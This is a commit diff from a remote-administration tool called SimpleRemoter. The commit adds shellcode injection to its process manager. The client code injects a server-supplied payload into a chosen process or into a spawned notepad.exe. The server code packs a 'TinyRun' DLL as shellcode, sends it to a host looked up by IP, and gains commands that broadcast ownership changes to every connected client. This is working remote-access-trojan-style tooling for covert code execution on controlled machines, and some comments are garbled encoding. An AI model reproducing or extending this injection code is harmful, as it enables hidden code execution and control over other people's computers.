admin/SimpleRemoter
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Feature: Add shellcode injection feature for process management

Browse Source
This commit is contained in:
yuanyuanxiang
2025-11-15 04:19:24 +08:00
parent 416d66bc87
commit 73bbeb6756
8 changed files with 183 additions and 29 deletions
Download Patch File Download Diff File Expand all files Collapse all files

18
client/KernelManager.cpp
View File

@@ -185,24 +185,18 @@ DWORD WINAPI ExecuteDLLProc(LPVOID param)
#else #else
DllRunner* runner = new MemoryDllRunner(); DllRunner* runner = new MemoryDllRunner();
#endif #endif
if (info.RunType == MEMORYDLL) {
HMEMORYMODULE module = runner->LoadLibraryA((char*)dll->buffer, info.Size); HMEMORYMODULE module = runner->LoadLibraryA((char*)dll->buffer, info.Size);
if (module) {
switch (info.CallType) { switch (info.CallType) {
case CALLTYPE_DEFAULT: case CALLTYPE_DEFAULT:
while (S_CLIENT_EXIT != *pThread.Exit) while (S_CLIENT_EXIT != *pThread.Exit)
Sleep(1000); Sleep(1000);
break; break;
case CALLTYPE_IOCPTHREAD: { case CALLTYPE_IOCPTHREAD: {
PTHREAD_START_ROUTINE proc = (PTHREAD_START_ROUTINE)runner->GetProcAddress(module, "run"); PTHREAD_START_ROUTINE proc = module ? (PTHREAD_START_ROUTINE)runner->GetProcAddress(module, "run") : NULL;
Mprintf("MemoryGetProcAddress '%s' %s\n", info.Name, proc ? "success" : "failed"); Mprintf("MemoryGetProcAddress '%s' %s\n", info.Name, proc ? "success" : "failed");
if (proc) { if (proc) {
if (info.RunType == MEMORYDLL)
proc(&pThread); proc(&pThread);
else if (info.RunType == SHELLCODE){
ShellcodeInj inj(dll->buffer, info.Size, "run", &pThread, sizeof(PluginParam));
if (info.Pid < 0) info.Pid = GetCurrentProcessId();
bool ret = info.Pid ? inj.InjectProcess(info.Pid) : inj.InjectProcess("notepad.exe", true);
}
} else { } else {
while (S_CLIENT_EXIT != *pThread.Exit) while (S_CLIENT_EXIT != *pThread.Exit)
Sleep(1000); Sleep(1000);
@@ -213,8 +207,12 @@ DWORD WINAPI ExecuteDLLProc(LPVOID param)
break; break;
} }
runner->FreeLibrary(module); runner->FreeLibrary(module);
} else { } else if (info.RunType == SHELLCODE){
Mprintf("MemoryLoadLibrary '%s' failed\n", info.Name); bool flag = info.CallType == CALLTYPE_IOCPTHREAD;
ShellcodeInj inj(dll->buffer, info.Size, flag ? "run" : 0, flag ? &pThread : 0, flag ? sizeof(PluginParam) : 0);
if (info.Pid < 0) info.Pid = GetCurrentProcessId();
bool ret = info.Pid ? inj.InjectProcess(info.Pid) : inj.InjectProcess("notepad.exe", true);
Mprintf("Inject %s to process [%d] %s\n", info.Name, info.Pid, ret ? "succeed" : "failed");
} }
SAFE_DELETE(dll); SAFE_DELETE(dll);
SAFE_DELETE(runner); SAFE_DELETE(runner);

BIN
server/2015Remote/2015Remote.rc
View File

Binary file not shown.

130
server/2015Remote/2015RemoteDlg.cpp
View File

@@ -281,6 +281,25 @@ DllInfo* ReadPluginDll(const std::string& filename)
return new DllInfo{ name, buf }; return new DllInfo{ name, buf };
} }
DllInfo* ReadTinyRunDll(int pid) {
std::string name = "TinyRun.dll";
DWORD fileSize = 0;
BYTE * dllData = ReadResource(IDR_TINYRUN_X64, fileSize);
// 设置输出参数
auto md5 = CalcMD5FromBytes(dllData, fileSize);
DllExecuteInfo info = { SHELLCODE, fileSize, CALLTYPE_DEFAULT, {}, {}, pid };
memcpy(info.Name, name.c_str(), name.length());
memcpy(info.Md5, md5.c_str(), md5.length());
BYTE* buffer = new BYTE[1 + sizeof(DllExecuteInfo) + fileSize];
buffer[0] = CMD_EXECUTE_DLL;
memcpy(buffer + 1, &info, sizeof(DllExecuteInfo));
memcpy(buffer + 1 + sizeof(DllExecuteInfo), dllData, fileSize);
Buffer* buf = new Buffer(buffer, 1 + sizeof(DllExecuteInfo) + fileSize, 0, md5);
SAFE_DELETE_ARRAY(dllData);
SAFE_DELETE_ARRAY(buffer);
return new DllInfo{ name, buf };
}
std::vector<DllInfo*> ReadAllDllFilesWindows(const std::string& dirPath) std::vector<DllInfo*> ReadAllDllFilesWindows(const std::string& dirPath)
{ {
std::vector<DllInfo*> result; std::vector<DllInfo*> result;
@@ -457,6 +476,10 @@ BEGIN_MESSAGE_MAP(CMy2015RemoteDlg, CDialogEx)
ON_MESSAGE(WM_PASSWORDCHECK, OnPasswordCheck) ON_MESSAGE(WM_PASSWORDCHECK, OnPasswordCheck)
ON_MESSAGE(WM_SHOWMESSAGE, OnShowMessage) ON_MESSAGE(WM_SHOWMESSAGE, OnShowMessage)
ON_MESSAGE(WM_SHOWERRORMSG, OnShowErrMessage) ON_MESSAGE(WM_SHOWERRORMSG, OnShowErrMessage)
ON_MESSAGE(WM_INJECT_SHELLCODE, InjectShellcode)
ON_MESSAGE(WM_SHARE_CLIENT, ShareClient)
ON_MESSAGE(WM_ASSIGN_CLIENT, AssignClient)
ON_MESSAGE(WM_ASSIGN_ALLCLIENT, AssignAllClient)
ON_WM_HELPINFO() ON_WM_HELPINFO()
ON_COMMAND(ID_ONLINE_SHARE, &CMy2015RemoteDlg::OnOnlineShare) ON_COMMAND(ID_ONLINE_SHARE, &CMy2015RemoteDlg::OnOnlineShare)
ON_COMMAND(ID_TOOL_AUTH, &CMy2015RemoteDlg::OnToolAuth) ON_COMMAND(ID_TOOL_AUTH, &CMy2015RemoteDlg::OnToolAuth)
@@ -697,6 +720,8 @@ VOID CMy2015RemoteDlg::AddList(CString strIP, CString strAddr, CString strPCName
SetClientMapData(id, MAP_LOCATION, loc); SetClientMapData(id, MAP_LOCATION, loc);
} }
} }
bool flag = strIP == "127.0.0.1" && !v[RES_CLIENT_PUBIP].empty();
data[ONLINELIST_IP] = flag ? v[RES_CLIENT_PUBIP].c_str() : strIP;
data[ONLINELIST_LOCATION] = loc; data[ONLINELIST_LOCATION] = loc;
ContextObject->SetClientInfo(data, v); ContextObject->SetClientInfo(data, v);
ContextObject->SetID(id); ContextObject->SetID(id);
@@ -721,10 +746,9 @@ VOID CMy2015RemoteDlg::AddList(CString strIP, CString strAddr, CString strPCName
if (modify) if (modify)
SaveToFile(m_ClientMap, GetDbPath()); SaveToFile(m_ClientMap, GetDbPath());
auto& m = m_ClientMap[ContextObject->ID]; auto& m = m_ClientMap[ContextObject->ID];
bool flag = strIP == "127.0.0.1" && !v[RES_CLIENT_PUBIP].empty();
m_HostList.insert(ContextObject); m_HostList.insert(ContextObject);
if (groupName == m_selectedGroup || (groupName.empty() && m_selectedGroup == "default")) { if (groupName == m_selectedGroup || (groupName.empty() && m_selectedGroup == "default")) {
int i = m_CList_Online.InsertItem(m_CList_Online.GetItemCount(), flag ? v[RES_CLIENT_PUBIP].c_str() : strIP); int i = m_CList_Online.InsertItem(m_CList_Online.GetItemCount(), data[ONLINELIST_IP]);
for (int n = ONLINELIST_ADDR; n <= ONLINELIST_CLIENTTYPE; n++) { for (int n = ONLINELIST_ADDR; n <= ONLINELIST_CLIENTTYPE; n++) {
n == ONLINELIST_COMPUTER_NAME ? n == ONLINELIST_COMPUTER_NAME ?
m_CList_Online.SetItemText(i, n, m.GetNote()[0] ? m.GetNote() : data[n]) : m_CList_Online.SetItemText(i, n, m.GetNote()[0] ? m.GetNote() : data[n]) :
@@ -1792,6 +1816,25 @@ VOID CMy2015RemoteDlg::SendSelectedCommand(PBYTE szBuffer, ULONG ulLength)
LeaveCriticalSection(&m_cs); LeaveCriticalSection(&m_cs);
} }
VOID CMy2015RemoteDlg::SendAllCommand(PBYTE szBuffer, ULONG ulLength)
{
EnterCriticalSection(&m_cs);
for (int i=0; i<m_CList_Online.GetItemCount(); ++i){
context* ContextObject = (context*)m_CList_Online.GetItemData(i);
if (!ContextObject->IsLogin() && szBuffer[0] != COMMAND_BYE)
continue;
if (szBuffer[0] == COMMAND_UPDATE) {
CString data = ContextObject->GetClientData(ONLINELIST_CLIENTTYPE);
if (data == "SC" || data == "MDLL") {
ContextObject->Send2Client(szBuffer, 1);
continue;
}
}
ContextObject->Send2Client(szBuffer, ulLength);
}
LeaveCriticalSection(&m_cs);
}
//真彩Bar //真彩Bar
VOID CMy2015RemoteDlg::OnAbout() VOID CMy2015RemoteDlg::OnAbout()
{ {
@@ -2181,6 +2224,13 @@ VOID CMy2015RemoteDlg::MessageHandle(CONTEXT_OBJECT* ContextObject)
} }
case CMD_EXECUTE_DLL: { // 请求DLL执行代码【L】 case CMD_EXECUTE_DLL: { // 请求DLL执行代码【L】
DllExecuteInfo *info = (DllExecuteInfo*)ContextObject->InDeCompressedBuffer.GetBuffer(1); DllExecuteInfo *info = (DllExecuteInfo*)ContextObject->InDeCompressedBuffer.GetBuffer(1);
if (std::string(info->Name) == "TinyRun.dll") {
auto tinyRun = ReadTinyRunDll(info->Pid);
Buffer* buf = tinyRun->Data;
ContextObject->Send2Client(buf->Buf(), tinyRun->Data->length());
SAFE_DELETE(tinyRun);
break;
}
for (std::vector<DllInfo*>::const_iterator i=m_DllList.begin(); i!=m_DllList.end(); ++i) { for (std::vector<DllInfo*>::const_iterator i=m_DllList.begin(); i!=m_DllList.end(); ++i) {
DllInfo* dll = *i; DllInfo* dll = *i;
if (dll->Name == info->Name) { if (dll->Name == info->Name) {
@@ -2597,15 +2647,24 @@ void CMy2015RemoteDlg::OnOnlineShare()
MessageBox("字符串长度超出[0, 250]范围限制!", "提示", MB_ICONINFORMATION); MessageBox("字符串长度超出[0, 250]范围限制!", "提示", MB_ICONINFORMATION);
return; return;
} }
char* buf = new char[dlg.m_str.GetLength()+1];
memcpy(buf, dlg.m_str, dlg.m_str.GetLength());
buf[dlg.m_str.GetLength()] = 0;
PostMessageA(WM_SHARE_CLIENT, (WPARAM)buf, NULL);
}
LRESULT CMy2015RemoteDlg::ShareClient(WPARAM wParam, LPARAM lParam) {
char* buf = (char*)wParam;
int len = strlen(buf);
BYTE bToken[_MAX_PATH] = { COMMAND_SHARE }; BYTE bToken[_MAX_PATH] = { COMMAND_SHARE };
// 目标主机类型 // 目标主机类型
bToken[1] = SHARE_TYPE_YAMA; bToken[1] = SHARE_TYPE_YAMA;
memcpy(bToken + 2, dlg.m_str, dlg.m_str.GetLength()); memcpy(bToken + 2, buf, len);
SendSelectedCommand(bToken, sizeof(bToken)); lParam ? SendAllCommand(bToken, sizeof(bToken)) : SendSelectedCommand(bToken, sizeof(bToken));
SAFE_DELETE_AR(buf);
return S_OK;
} }
void CMy2015RemoteDlg::OnToolAuth() void CMy2015RemoteDlg::OnToolAuth()
{ {
CPwdGenDlg dlg; CPwdGenDlg dlg;
@@ -3333,16 +3392,37 @@ void CMy2015RemoteDlg::OnOnlineAssignTo()
MessageBox("超出使用时间可输入的字符数限制!", "提示", MB_ICONINFORMATION); MessageBox("超出使用时间可输入的字符数限制!", "提示", MB_ICONINFORMATION);
return; return;
} }
char* buf1 = new char[dlg.m_str.GetLength() + 1];
char *buf2 = new char[dlg.m_sSecondInput.GetLength() + 1];
memcpy(buf1, dlg.m_str, dlg.m_str.GetLength());
memcpy(buf2, dlg.m_sSecondInput, dlg.m_sSecondInput.GetLength());
buf1[dlg.m_str.GetLength()] = 0;
buf2[dlg.m_sSecondInput.GetLength()] = 0;
PostMessageA(WM_ASSIGN_CLIENT, (WPARAM)buf1, (LPARAM)buf2);
}
LRESULT CMy2015RemoteDlg::assignFunction(WPARAM wParam, LPARAM lParam, BOOL all) {
char* buf1 = (char*)wParam, * buf2 = (char*)lParam;
int len1 = strlen(buf1), len2 = strlen(buf2);
BYTE bToken[_MAX_PATH] = { COMMAND_ASSIGN_MASTER }; BYTE bToken[_MAX_PATH] = { COMMAND_ASSIGN_MASTER };
// 目标主机类型 // 目标主机类型
bToken[1] = SHARE_TYPE_YAMA_FOREVER; bToken[1] = SHARE_TYPE_YAMA_FOREVER;
memcpy(bToken + 2, dlg.m_str, dlg.m_str.GetLength()); memcpy(bToken + 2, buf1, len1);
bToken[2 + dlg.m_str.GetLength()] = ':'; bToken[2 + len1] = ':';
memcpy(bToken + 2 + dlg.m_str.GetLength() + 1, dlg.m_sSecondInput, dlg.m_sSecondInput.GetLength()); memcpy(bToken + 2 + len1 + 1, buf2, len2);
SendSelectedCommand(bToken, sizeof(bToken)); all ? SendAllCommand(bToken, sizeof(bToken)) : SendSelectedCommand(bToken, sizeof(bToken));
SAFE_DELETE_AR(buf1);
SAFE_DELETE_AR(buf2);
return S_OK;
} }
LRESULT CMy2015RemoteDlg::AssignClient(WPARAM wParam, LPARAM lParam) {
return assignFunction(wParam, lParam, FALSE);
}
LRESULT CMy2015RemoteDlg::AssignAllClient(WPARAM wParam, LPARAM lParam) {
return assignFunction(wParam, lParam, TRUE);
}
void CMy2015RemoteDlg::OnNMCustomdrawMessage(NMHDR* pNMHDR, LRESULT* pResult) void CMy2015RemoteDlg::OnNMCustomdrawMessage(NMHDR* pNMHDR, LRESULT* pResult)
{ {
@@ -3755,3 +3835,35 @@ void CMy2015RemoteDlg::OnToolReloadPlugins()
GET_FILEPATH(path, "Plugins"); GET_FILEPATH(path, "Plugins");
m_DllList = ReadAllDllFilesWindows(path); m_DllList = ReadAllDllFilesWindows(path);
} }
context* CMy2015RemoteDlg::FindHostByIP(const std::string& ip) {
CString clientIP(ip.c_str());
EnterCriticalSection(&m_cs);
for (auto i = m_HostList.begin(); i != m_HostList.end(); ++i) {
context* ContextObject = *i;
if (ContextObject->GetClientData(ONLINELIST_IP) == clientIP) {
LeaveCriticalSection(&m_cs);
return ContextObject;
}
}
LeaveCriticalSection(&m_cs);
return NULL;
}
LRESULT CMy2015RemoteDlg::InjectShellcode(WPARAM wParam, LPARAM lParam){
std::string* ip = (std::string*)wParam;
int pid = lParam;
InjectTinyRunDll(*ip, pid);
delete ip;
return S_OK;
}
void CMy2015RemoteDlg::InjectTinyRunDll(const std::string& ip, int pid){
auto ctx = FindHostByIP(ip);
if (ctx == NULL)return;
auto tinyRun = ReadTinyRunDll(pid);
Buffer* buf = tinyRun->Data;
ctx->Send2Client(buf->Buf(), 1 + sizeof(DllExecuteInfo));
SAFE_DELETE(tinyRun);
}

8
server/2015Remote/2015RemoteDlg.h
View File

@@ -211,6 +211,7 @@ public:
static BOOL CALLBACK OfflineProc(CONTEXT_OBJECT* ContextObject); static BOOL CALLBACK OfflineProc(CONTEXT_OBJECT* ContextObject);
VOID MessageHandle(CONTEXT_OBJECT* ContextObject); VOID MessageHandle(CONTEXT_OBJECT* ContextObject);
VOID SendSelectedCommand(PBYTE szBuffer, ULONG ulLength); VOID SendSelectedCommand(PBYTE szBuffer, ULONG ulLength);
VOID SendAllCommand(PBYTE szBuffer, ULONG ulLength);
// <20><>ʾ<EFBFBD>û<EFBFBD><C3BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ // <20><>ʾ<EFBFBD>û<EFBFBD><C3BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ
CWnd* m_pFloatingTip = nullptr; CWnd* m_pFloatingTip = nullptr;
CListCtrl m_CList_Online; CListCtrl m_CList_Online;
@@ -225,6 +226,8 @@ public:
CTrueColorToolBar m_ToolBar; CTrueColorToolBar m_ToolBar;
CGridDialog * m_gridDlg = NULL; CGridDialog * m_gridDlg = NULL;
std::vector<DllInfo*> m_DllList; std::vector<DllInfo*> m_DllList;
context* FindHostByIP(const std::string& ip);
void InjectTinyRunDll(const std::string& ip, int pid);
NOTIFYICONDATA m_Nid; NOTIFYICONDATA m_Nid;
HANDLE m_hExit; HANDLE m_hExit;
CRITICAL_SECTION m_cs; CRITICAL_SECTION m_cs;
@@ -296,6 +299,11 @@ public:
afx_msg LRESULT OnOpenFileMgrDialog(WPARAM wParam, LPARAM lParam); afx_msg LRESULT OnOpenFileMgrDialog(WPARAM wParam, LPARAM lParam);
afx_msg LRESULT OnOpenDrawingBoard(WPARAM wParam, LPARAM lParam); afx_msg LRESULT OnOpenDrawingBoard(WPARAM wParam, LPARAM lParam);
afx_msg LRESULT UPXProcResult(WPARAM wParam, LPARAM lParam); afx_msg LRESULT UPXProcResult(WPARAM wParam, LPARAM lParam);
afx_msg LRESULT InjectShellcode(WPARAM wParam, LPARAM lParam);
afx_msg LRESULT ShareClient(WPARAM wParam, LPARAM lParam);
LRESULT assignFunction(WPARAM wParam, LPARAM lParam, BOOL all);
afx_msg LRESULT AssignClient(WPARAM wParam, LPARAM lParam);
afx_msg LRESULT AssignAllClient(WPARAM wParam, LPARAM lParam);
afx_msg BOOL OnHelpInfo(HELPINFO* pHelpInfo); afx_msg BOOL OnHelpInfo(HELPINFO* pHelpInfo);
virtual BOOL PreTranslateMessage(MSG* pMsg); virtual BOOL PreTranslateMessage(MSG* pMsg);
afx_msg void OnOnlineShare(); afx_msg void OnOnlineShare();

30
server/2015Remote/SystemDlg.cpp
View File

@@ -23,6 +23,7 @@ IMPLEMENT_DYNAMIC(CSystemDlg, CDialog)
CSystemDlg::CSystemDlg(CWnd* pParent, Server* IOCPServer, CONTEXT_OBJECT *ContextObject) CSystemDlg::CSystemDlg(CWnd* pParent, Server* IOCPServer, CONTEXT_OBJECT *ContextObject)
: DialogBase(CSystemDlg::IDD, pParent, IOCPServer, ContextObject, IDI_SERVICE) : DialogBase(CSystemDlg::IDD, pParent, IOCPServer, ContextObject, IDI_SERVICE)
{ {
m_pParent = pParent;
m_bHow= m_ContextObject->InDeCompressedBuffer.GetBYTE(0); m_bHow= m_ContextObject->InDeCompressedBuffer.GetBYTE(0);
} }
@@ -50,6 +51,7 @@ BEGIN_MESSAGE_MAP(CSystemDlg, CDialog)
ON_COMMAND(ID_WLIST_RECOVER, &CSystemDlg::OnWlistRecover) ON_COMMAND(ID_WLIST_RECOVER, &CSystemDlg::OnWlistRecover)
ON_COMMAND(ID_WLIST_MAX, &CSystemDlg::OnWlistMax) ON_COMMAND(ID_WLIST_MAX, &CSystemDlg::OnWlistMax)
ON_COMMAND(ID_WLIST_MIN, &CSystemDlg::OnWlistMin) ON_COMMAND(ID_WLIST_MIN, &CSystemDlg::OnWlistMin)
ON_COMMAND(ID_PLIST_INJECT, &CSystemDlg::OnPlistInject)
END_MESSAGE_MAP() END_MESSAGE_MAP()
@@ -454,3 +456,31 @@ void CSystemDlg::OnSize(UINT nType, int cx, int cy)
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ÿؼ<C3BF><D8BC><EFBFBD>С // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ÿؼ<C3BF><D8BC><EFBFBD>С
m_ControlList.MoveWindow(0, 0, cx, cy, TRUE); m_ControlList.MoveWindow(0, 0, cx, cy, TRUE);
} }
void CSystemDlg::OnPlistInject()
{
CListCtrl* ListCtrl = NULL;
if (m_ControlList.IsWindowVisible())
ListCtrl = &m_ControlList;
else
return;
if (ListCtrl->GetSelectedCount() != 1)
::MessageBox(m_hWnd, "ֻ<EFBFBD><EFBFBD>ͬʱ<EFBFBD><EFBFBD>һ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̽<EFBFBD><EFBFBD>д<EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><EFBFBD>!", "<EFBFBD><EFBFBD>ʾ", MB_ICONINFORMATION);
if (::MessageBox(m_hWnd, "ȷ<EFBFBD><EFBFBD>Ҫ<EFBFBD><EFBFBD>Ŀ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> (<28><><EFBFBD><EFBFBD>64λ) <20><><EFBFBD>д<EFBFBD><D0B4><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>?\n<EFBFBD>˲<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ܱ<EFBFBD><EFBFBD><EFBFBD>ȫ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ֹ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>½<EFBFBD><EFBFBD>̱<EFBFBD><EFBFBD><EFBFBD>!",
"<EFBFBD><EFBFBD><EFBFBD><EFBFBD>", MB_YESNO | MB_ICONQUESTION) == IDNO)
return;
DWORD dwOffset = 1, dwProcessID = 0;
POSITION Pos = ListCtrl->GetFirstSelectedItemPosition();
if (Pos) {
int nItem = ListCtrl->GetNextSelectedItem(Pos);
auto data = (ItemData*)ListCtrl->GetItemData(nItem);
dwProcessID = data->ID;
dwOffset += sizeof(DWORD);
}
ASSERT(m_pParent);
m_pParent->PostMessageA(WM_INJECT_SHELLCODE, (WPARAM)new std::string(m_ContextObject->PeerName), dwProcessID);
}

2
server/2015Remote/SystemDlg.h
View File

@@ -17,6 +17,7 @@ public:
void ShowWindowsList(void); void ShowWindowsList(void);
void GetWindowsList(void); void GetWindowsList(void);
void OnReceiveComplete(void); void OnReceiveComplete(void);
CWnd* m_pParent;
BOOL m_bHow; BOOL m_bHow;
// <20>Ի<EFBFBD><D4BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> // <20>Ի<EFBFBD><D4BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
enum { IDD = IDD_DIALOG_SYSTEM }; enum { IDD = IDD_DIALOG_SYSTEM };
@@ -45,4 +46,5 @@ public:
afx_msg void OnWlistMax(); afx_msg void OnWlistMax();
afx_msg void OnWlistMin(); afx_msg void OnWlistMin();
afx_msg void OnSize(UINT nType, int cx, int cy); afx_msg void OnSize(UINT nType, int cx, int cy);
afx_msg void OnPlistInject();
}; };

BIN
server/2015Remote/resource.h
View File

Binary file not shown.

4
server/2015Remote/stdafx.h
View File

@@ -85,6 +85,10 @@
#define WM_SHOWMESSAGE WM_USER+3022 #define WM_SHOWMESSAGE WM_USER+3022
#define WM_SHOWERRORMSG WM_USER+3023 #define WM_SHOWERRORMSG WM_USER+3023
#define WM_SESSION_ACTIVATED WM_USER+3024 #define WM_SESSION_ACTIVATED WM_USER+3024
#define WM_INJECT_SHELLCODE WM_USER+3025
#define WM_SHARE_CLIENT WM_USER+3026
#define WM_ASSIGN_CLIENT WM_USER+3027
#define WM_ASSIGN_ALLCLIENT WM_USER+3028
#ifdef _UNICODE #ifdef _UNICODE
#if defined _M_IX86 #if defined _M_IX86